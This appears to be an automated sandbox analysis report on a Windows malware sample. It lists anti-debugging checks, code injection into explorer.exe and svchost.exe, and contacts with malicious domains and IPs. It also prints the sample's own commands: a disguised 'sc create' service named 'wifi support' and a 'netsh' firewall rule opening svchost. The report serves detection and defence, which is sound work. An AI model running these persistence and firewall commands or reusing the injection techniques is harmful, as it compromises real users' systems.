                          Source: C:\Windows\SysWOW64\svchost.exe TID: 4292Thread sleep time: -46000s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeLast function: Thread delayed
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 625
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 441
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 376
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeAPI coverage: 8.1 %
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeAPI coverage: 6.4 %
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeAPI coverage: 4.7 %
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00636CF0
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C487.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B3EB.exeJump to dropped file
                          Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CF17.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeAPI call chain: ExitProcess graph end node
                          Source: explorer.exe, 00000005.00000000.698292375.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000005.00000000.698343578.000000000A64D000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
                          Source: svchost.exe, 00000016.00000002.819381946.000001A7842C5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWdisplaycatalogmp.microsoft.com
                          Source: explorer.exe, 00000005.00000000.679650930.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000005.00000000.698292375.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: WerFault.exe, 00000011.00000002.805301079.0000000004FA6000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.819415155.000001A7842EC000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.819339202.000001A7842A4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.676763335.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                          Source: explorer.exe, 00000005.00000000.698401055.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                          Source: explorer.exe, 00000005.00000000.681175465.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                          Source: WerFault.exe, 00000011.00000002.805439702.0000000005000000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.800381476.0000000005000000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.799626903.0000000005000000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.800248547.0000000005000000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00419A51 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00638A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006312E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006314D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00636090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00639930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00639BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00639D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          barindex
                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\adijaegSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_004358C0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00560042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00580083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0059092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00590D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_00560042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_0063092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00631250 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_0063C3D0 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00630D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00861F83 push dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_0063092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_00630D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_008AE320 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\adijaegProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0042BCD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0042CB92 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00419C9A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,SetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeMemory protected: page guard
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0043ABA0 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0042BCD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00422C80 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00428530 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.47.54.36 25
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exeDomain query: privacy-tools-for-you-780.com
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Benign windows process drops PE filesShow sources
                          Source: C:\Windows\explorer.exeFile created: CF17.exe.5.drJump to dropped file
                          Maps a DLL or memory area into another processShow sources
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\adijaegSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\adijaegSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processesShow sources
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 2360000 protect: page execute and read and write
                          Injects a PE file into a foreign processesShow sources
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeMemory written: C:\Users\user\Desktop\sbxGIUIhRd.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeMemory written: C:\Users\user\AppData\Local\Temp\95C6.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeMemory written: C:\Users\user\AppData\Local\Temp\FA5C.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2360000 value starts with: 4D5A
                          Contains functionality to inject code into remote processesShow sources
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00560110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)Show sources
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeThread created: C:\Windows\explorer.exe EIP: 4DC1930
                          Source: C:\Users\user\AppData\Roaming\adijaegThread created: unknown EIP: 4F81930
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeThread created: unknown EIP: 5C81930
                          Writes to foreign memory regionsShow sources
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2360000
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2488008
                          .NET source code references suspicious native API functionsShow sources
                          Source: FA5C.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: FA5C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 21.0.FA5C.exe.530000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 21.0.FA5C.exe.530000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 21.0.FA5C.exe.530000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 21.0.FA5C.exe.530000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 21.0.FA5C.exe.530000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 21.0.FA5C.exe.530000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 39.0.FA5C.exe.400000.12.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 39.0.FA5C.exe.ab0000.7.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 39.0.FA5C.exe.ab0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: 39.0.FA5C.exe.400000.4.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 39.0.FA5C.exe.ab0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                          Source: 39.0.FA5C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csReference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeProcess created: C:\Users\user\Desktop\sbxGIUIhRd.exe "C:\Users\user\Desktop\sbxGIUIhRd.exe"
                          Source: C:\Users\user\AppData\Roaming\adijaegProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeProcess created: C:\Users\user\AppData\Local\Temp\95C6.exe C:\Users\user\AppData\Local\Temp\95C6.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start txlhcyih
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeProcess created: C:\Users\user\AppData\Local\Temp\FA5C.exe C:\Users\user\AppData\Local\Temp\FA5C.exe
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
